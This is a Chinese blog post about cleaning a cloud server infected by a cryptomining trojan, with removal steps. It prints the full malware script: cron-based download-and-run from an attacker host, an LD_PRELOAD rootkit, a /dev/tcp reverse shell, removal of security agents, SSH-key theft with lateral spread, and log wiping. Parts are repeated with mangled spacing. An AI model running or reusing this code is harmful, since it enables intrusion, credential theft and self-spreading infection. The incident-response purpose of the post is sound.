云服务中了挖矿病毒的处理

用户的云服务器是腾讯云的,在找我来之前应该就被恶意感染了木马,占用cpu过高,很容晚就被发现了。 

   每次运行命令 会出现如下:

ERROR: ld.so: object '/usr/local/lib/.libd.so' from /etc/ld.so.preload cannot be preloaded: ignored.

第一件事就是杀进程,CPU就降了下去。但是过一会就又开始升上来。脑子清醒的时候,转的快,一下子就判断肯定在定时器哪里做了手脚,执行crontab -l 出现了

3023* * * (curl -shttp://w.apacheorg.top:1234/xmss||wget -q -O -http://w.apacheorg.top:1234/xmss)|bash -sh

下载打开文件

#!/bin/bashSHELL=/bin/bashPATH=/sbin:/bin:/usr/sbin:/usr/binsetenforce 0 2>/dev/nullulimit -n 65535ufw disableiptables -Fecho "vm.nr_hugepages=$((1168+$(nproc)))" | tee -a /etc/sysctl.confsysctl -w vm.nr_hugepages=$((1168+$(nproc)))echo '0'   >/proc/sys/kernel/imi_watchdogecho 'kernel.nmi_watchdog=0' >>/etc/sysctl.confnetstat -antp | grep ':3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep ':4444' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep ':5555' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep ':7777' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep ':14444' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep ':5790' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep ':45700' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep ':2222' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep ':9999' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep ':20580' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep ':13531' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %netstat -antp | grep '23.94.24.12' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %netstat -antp | grep '134.122.17.13' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %netstat -antp | grep '66.70.218.40' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %netstat -antp | grep '209.141.35.17' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %echo "123"netstat -antp | grep '119.28.4.91' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %netstat -antp | grep '101.32.73.178' | awk '{print $7}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %netstat -antp | grep 185.238.250.137 | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep tmate | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep kinsing | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep kdevtmpfsi | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep pythonww | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep tcpp | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep c3pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep xmr | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep f2pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep crypto-pool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep t00ls | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep vihansoft | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %netstat -antp | grep mrbpool | awk '{print $7}' | awk -F '[/]' '{print $1}' | xargs -I % kill -9 %ps -fe | grep '/usr/sbin/sshd' | grep 'sshgood' | grep -v grep | awk '{print $2}' | sed -e 's/\/.*//g' | xargs -I % kill -9 %ps aux | grep -a -E "kdevtmpfsi|kinsing|solr|f2pool|tcpp|xmr|tmate|185.238.250.137|c3pool" | awk '{print $2}' | xargs kill -9der(){ if ps aux | grep -i '[a]liyun'; then (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh pkill aliyun-service rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service rm -rf /usr/local/aegis* systemctl stop aliyun.service systemctl disable aliyun.service service bcm-agent stop yum remove bcm-agent -y apt-get remove bcm-agent -y /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove rm -rf /usr/local/cloudmonitor elif ps aux | grep -i '[y]unjing'; then /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /usr/local/qcloud/monitor/barad/admin/uninstall.sh fi sleep 1 echo "DER Uninstalled"}derif ! [ -z "$(command -v wdl)" ] ; then DLB="wdl -O " ; fi ; if ! [ -z "$(command -v wge)" ] ; then DLB="wge -O " ; fiif ! [ -z "$(command -v wget2)" ] ; then DLB="wget2 -O " ; fi ; if ! [ -z "$(command -v wget)" ] ; then DLB="wget -O " ; fiif ! [ -z "$(command -v cdl)" ] ; then DLB="cdl -Lk -o " ; fi ; if ! [ -z "$(command -v cur)" ] ; then DLB="cur -Lk -o " ; fiif ! [ -z "$(command -v curl2)" ] ; then DLB="curl2 -Lk -o " ; fi ; if ! [ -z "$(command -v curl)" ] ; then DLB="curl -Lk -o " ; fiecho $DLBurl="w.apacheorg.top:1234"liburl="http://w.apacheorg.top:1234/.libs"cronlow(){ cr=$(crontab -l | grep -q $url | wc -l) if [ ${cr} -eq 0 ];then crontab -r (crontab -l 2>/dev/null; echo "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh")| crontab - else echo "cronlow skip" fi}kills() { /bin/ps axf -o "pid %cpu command" |grep -v river | awk '{if($2>50.0) print $1}' | while read procid do kill -9 $procid done}killsif [ -w /usr/sbin ]; then SPATH=/usr/sbinelse SPATH=/tmpfiecho $SPATHecho 'handling download itself ...'if cat /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 | grep -q "205.185.113.151\|5.196.247.12\|bash.givemexyz.xyz\|194.156.99.30\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw==\|bash.givemexyz.in\|205.185.116.78"then chattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 crontab -rfiif crontab -l | grep "$url"then echo "Cron exists"else apt-get install -y cron yum install -y vixie-cron crontabs service crond start chkconfig --level 35 crond on echo "Cron not found" echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/`whoami` echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/apache echo -e "30 23 * * * root (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /etc/cron.d/nginx echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/`whoami` mkdir -p /var/spool/cron/crontabs echo -e "30 23 * * * (curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh\n##" > /var/spool/cron/crontabs/`whoami` mkdir -p /etc/cron.hourly echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1 echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/init.d/down chattr +ai -V /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1 /etc/init.d/downfichattr -i -a /etc/cron.d/`whoami` /etc/cron.d/apache /var/spool/cron/`whoami` /var/spool/cron/crontabs/`whoami` /etc/cron.hourly/oanacroner1echo "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss )|bash -sh" > /etc/init.d/down | chmod 755 /etc/init.d/downlocalgo() { echo "localgo start" myhostip=$(curl -sL icanhazip.com) KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub) KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }') KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'}) KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq) HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}') HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}") HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}') HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}') HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq) HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq) USERZ=$( echo "root" find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh" ) USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq) sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22") userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d') hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-) keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-) i=0 for user in $userlist; do for host in $hostlist; do for key in $keylist; do for sshp in $sshports; do ((i++)) if [ "${i}" -eq "20" ]; then sleep 5 ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null & i=0 fi #Wait 5 seconds after every 20 attempts and clean up hanging processes chmod +r $key chmod 400 $key echo "$user@$host" ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms" ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms" done done done done # scangogo echo "local done"}MD5_1_XMR="e5c3720e14a5ea7f678e0a9835d28283"MD5_2_XMR=`md5sum $SPATH/.libs | awk '{print $1}'`if [ "$SPATH" = "/usr/sbin" ]then chattr -ia / /usr/ /usr/local/ /usr/local/lib/ 2>/dev/null if [ "$MD5_1_XMR" = "$MD5_2_XMR" ] then if [ $(netstat -ant|grep '107.172.214.23:80'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ] then $SPATH/.libs chattr -ia /etc/ /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null chattr -ai /etc/ld.so.* 2>/dev/null $DLB /usr/local/lib/libs.so http://$url/libs.so export LD_PRELOAD=/usr/local/lib/libs.so sed -i 's/\/usr\/local\/lib\/ini.so//' /etc/ld.so.preload sed -i 's/\/usr\/local\/lib\/libs.so//' /etc/ld.so.preload echo '/usr/local/lib/libs.so' >> /etc/ld.so.preload chattr +ai $SPATH/.libs $SPATH/.inis /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null localgo elif [ $(netstat -ant|grep '198.46.202.146:8899'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ] then $DLB $SPATH/.inis http://$url/inis chmod +x $SPATH/.inis 2>/dev/null nohup $SPATH/.inis & nohup bash -i >& /dev/tcp/198.46.202.146/8899 0>&1 & else echo "ok" chattr -ia /etc/ /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null chattr -ai /etc/ld.so.* 2>/dev/null $DLB /usr/local/lib/libs.so http://$url/libs.so sed -i 's/\/usr\/local\/lib\/ini.so//' /etc/ld.so.preload sed -i 's/\/usr\/local\/lib\/libs.so//' /etc/ld.so.preload export LD_PRELOAD=/usr/local/lib/libs.so echo '/usr/local/lib/libs.so' >> /etc/ld.so.preload chattr +ai $SPATH/.libs $SPATH/.inis /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null localgo fi localgo else chattr -ia /etc/ /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null chattr -ai /etc/ld.so.* 2>/dev/null chattr -ai /usr/sbin/.libs 2>/dev/null chattr -ai /usr/sbin/.inis 2>/dev/null rm -f $SPATH/.libs rm -f $SPATH/.inis $DLB $SPATH/.libs $liburl $DLB /usr/local/lib/libs.so http://$url/libs.so $DLB $SPATH/.ini http://$url/inis export LD_PRELOAD=/usr/local/lib/libs.so sed -i 's/\/usr\/local\/lib\/ini.so//' /etc/ld.so.preload sed -i 's/\/usr\/local\/lib\/libs.so//' /etc/ld.so.preload echo '/usr/local/lib/libs.so' >> /etc/ld.so.preload chattr +ia /usr/local/lib/libs.so chattr +ia /usr/local/lib/inis.so chmod +x $SPATH/.libs 2>/dev/null chmod +x $SPATH/.inis 2>/dev/null $SPATH/.libs nohup $SPATH/.inis 1>/dev/null 2>&1 & nohup bash -i >& /dev/tcp/198.46.202.146/8899 0>&1 & chattr +ai $SPATH/.libs chattr +ai $SPATH/.inis localgo fielse if [ "$MD5_1_XMR" != "$MD5_2_XMR" ] then $SPATH/.libs chattr -ai $SPATH/.inis $DLB $SPATH/.libs $liburl $DLB $SPATH/.inis http://$url/inis chattr -ia /etc/ /usr/local/lib/libs.so /etc/ld.so.preload 2>/dev/null chattr -ai /etc/ld.so.* 2>/dev/null $DLB /usr/local/lib/libs.so http://$url/libs.so sed -i 's/\/usr\/local\/lib\/ini.so//' /etc/ld.so.preload sed -i 's/\/usr\/local\/lib\/libs.so//' /etc/ld.so.preload echo '/usr/local/lib/libs.so' >> /etc/ld.so.preload chattr +ia /usr/local/lib/libs.so chmod +x $SPATH/.libs 2>/dev/null chmod +x $SPATH/.inis 2>/dev/null $SPATH/.libs nohup $SPATH/.inis 1>/dev/null 2>&1 & nohup bash -i >& /dev/tcp/198.46.202.146/8899 0>&1 & chattr +ai $SPATH/.libs chattr +ai $SPATH/.inis localgo cronlow else cronlow if [ $(netstat -ant|grep '107.172.214.23:80'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ] then $SPATH/.libs localgo elif [ $(netstat -ant|grep '198.46.202.146:8899'|grep 'ESTABLISHED'|grep -v grep|wc -l) -eq '0' ] then nohup $SPATH/.inis 1>/dev/null 2>&1 & nohup bash -i >& /dev/tcp/198.46.202.146/8899 0>&1 & else echo "ok" fi fifiecho 0>/root/.ssh/authorized_keysecho 0>/var/spool/mail/rootecho 0>/var/log/wtmpecho 0>/var/log/secureecho 0>/var/log/cronecho 0>~/.bash_historyhistory -c 2>/dev/null好家伙,把阿里云的安全扫描插件全干掉(虽然服务器是腾讯云的),这个木马病毒脚本稍微耍了下花头,安排了好多个定时器,但是不怕,我们按他的脚本来。先干定时器,执行crontab -e,删掉对应的命令,再查/etc/cron.d/,/var/spool/cron/,/etc/cron.hourly/oanacroner1, /var/spool/cron/crontabs/下面的文件,全删(当然如果有自己项目的定时命令,自己注意分辨)。再干/etc/ld.so.preload,发觉删不掉?执行下命令chattr -ai /etc/ld.so.preload,再删除再干/usr/local/lib/的.inis,.inid,.libd,.libs(可以打开文件确认下),删不掉,请按照上一步步骤(chattr -ai file)三步就基本ok了。这样就完事了吗?并没有。。。看他们的代码这一段localgo() { echo "localgo start" myhostip=$(curl -sL icanhazip.com) KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub) KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }') KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'}) KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq) HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}') HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}") HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}') HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}') HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq) HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq) USERZ=$( echo "root" find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh" ) USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq) sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22") userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d') hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-) keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-) i=0 for user in $userlist; do for host in $hostlist; do for key in $keylist; do for sshp in $sshports; do ((i++)) if [ "${i}" -eq "20" ]; then sleep 5 ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null & i=0 fi #Wait 5 seconds after every 20 attempts and clean up hanging processes chmod +r $key chmod 400 $key echo "$user@$host" ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms" ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$url/xmss||wget -q -O - http://$url/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms" done done done done # scangogo echo "local done"}

    把阿里云的安全扫描插件全干掉,这个木马病毒脚本安排了好多个定时器,但是不怕,按他的脚本来。

先干定时器,执行crontab -e,删掉对应的命令,再查/etc/cron.d/,/var/spool/cron/,/etc/cron.hourly/oanacroner1, /var/spool/cron/crontabs/下面的文件,全删(当然如果有自己项目的定时命令,自己注意分辨)。

再干/etc/ld.so.preload,发觉删不掉?执行下命令chattr -ai /etc/ld.so.preload,再删除

再干/usr/local/lib/的.inis,.inid,.libd,.libs(可以打开文件确认下),删不掉,请按照上一步步骤(chattr -ai file)

三步就基本ok了。

这样就完事了吗?并没有。。。

看他们的代码这一段

localgo() {  echo"localgo start"myhostip=$(curl -sL icanhazip.com)  KEYS=$(find ~/ /root/home -maxdepth3-name'id_rsa*'|grep-vw pub)  KEYS2=$(cat ~/.ssh/config/home/*/.ssh/config/root/.ssh/config |grepIdentityFile | awk -F"IdentityFile"'{print $2 }')  KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history |grep-E"(ssh|scp)"| awk -F' -i ''{print $2}'| awk'{print $1'})  KEYS4=$(find ~/ /root/home -maxdepth3-name'*.pem'| uniq)  HOSTS=$(cat ~/.ssh/config/home/*/.ssh/config/root/.ssh/config |grepHostName | awk -F"HostName"'{print $2}')  HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history |grep-E"(ssh|scp)"|grep-oP"([0-9]{1,3}\.){3}[0-9]{1,3}")  HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history |grep-E"(ssh|scp)"|tr':'' '| awk -F'@''{print $2}'| awk -F'{print $1}')  HOSTS4=$(cat /etc/hosts |grep-vw"0.0.0.0"|grep-vw"127.0.1.1"|grep-vw"127.0.0.1"|grep-vw $myhostip | sed -r'/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D'| awk'{print $1}')  HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts |grep-oP"([0-9]{1,3}\.){3}[0-9]{1,3}"| uniq)  HOSTS6=$(ps auxw |grep-oP"([0-9]{1,3}\.){3}[0-9]{1,3}"|grep":22"| uniq)  USERZ=$(    echo"root"find ~/ /root/home -maxdepth2-name'\.ssh'| uniq | xargs find |awk'/id_rsa/'| awk -F'/''{print $3}'| uniq | grep -wv ".ssh"

  )

  USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history |grep-vw"cp"|grep-vw"mv"|grep-vw"cd "|grep-vw"nano"|grep-vgrep|grep-E"(ssh|scp)"|tr':'' '| awk -F'@''{print $1}'| awk'{print $4}'| uniq)  sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history |grep-vw"cp"|grep-vw"mv"|grep-vw"cd "|grep-vw"nano"|grep-vgrep|grep-E"(ssh|scp)"|tr':'' '| awk -F'-p''{print $2}'| awk'{print $1}'| sed's/[^0-9]*//g'|tr' ''\n'| nl |sort-u -k2 |sort-n | cut -f2- | sed -e"\$a22")  userlist=$(echo"$USERZ $USERZ2"|tr' ''\n'| nl |sort-u -k2 |sort-n | cut -f2- |grep-vw"."|grep-vw"ssh"| sed'/\./d')  hostlist=$(echo"$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6"|grep-vw127.0.0.1|tr' ''\n'| nl |sort-u -k2 |sort-n | cut -f2-)  keylist=$(echo"$KEYS $KEYS2 $KEYS3 $KEYS4"|tr' ''\n'| nl |sort-u -k2 |sort-n | cut -f2-)  i=0foruser in $userlist;doforhost in $hostlist;doforkey in $keylist;doforsshp in $sshports;do((i++))if["${i}"-eq"20"]; thensleep5ps wx |grep"ssh -o"| awk'{print $1}'| xargskill-9&>/dev/null&            i=0fi#Wait 5 seconds after every 20 attempts and clean up hanging processeschmod+r $keychmod400$key          echo"$user@$host"ssh -oStrictHostKeyChecking=no-oBatchMode=yes -oConnectTimeout=3-i $key $user@$host -p $sshp"(curl -s http://$url/xmss||wget -q -O - http://$url/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"ssh -oStrictHostKeyChecking=no-oBatchMode=yes -oConnectTimeout=3-i $key $user@$host -p $sshp"(curl -s http://$url/xmss||wget -q -O - http://$url/xmss)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"done      done    done  done# scangogoecho"local done"}

这段脚本是干嘛用的呢?打包ssh登录密码和证书用的。。。

ssh-oStrictHostKeyChecking=no-oBatchMode=yes-oConnectTimeout=3-i$key$user@$host-p$sshp"(curl -s http://$url/xmss||wget -q -O - http://$url/xmss)|bash -sh; echo$base| base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"

然后进行ssh登录,再次写入他们的脚本。 所以最后一步就是改密码改账号。 到这里完毕。

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,189评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,577评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,857评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,703评论 1 276
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,705评论 5 366
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,620评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,995评论 3 396
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,656评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,898评论 1 298
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,639评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,720评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,395评论 4 319
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,982评论 3 307
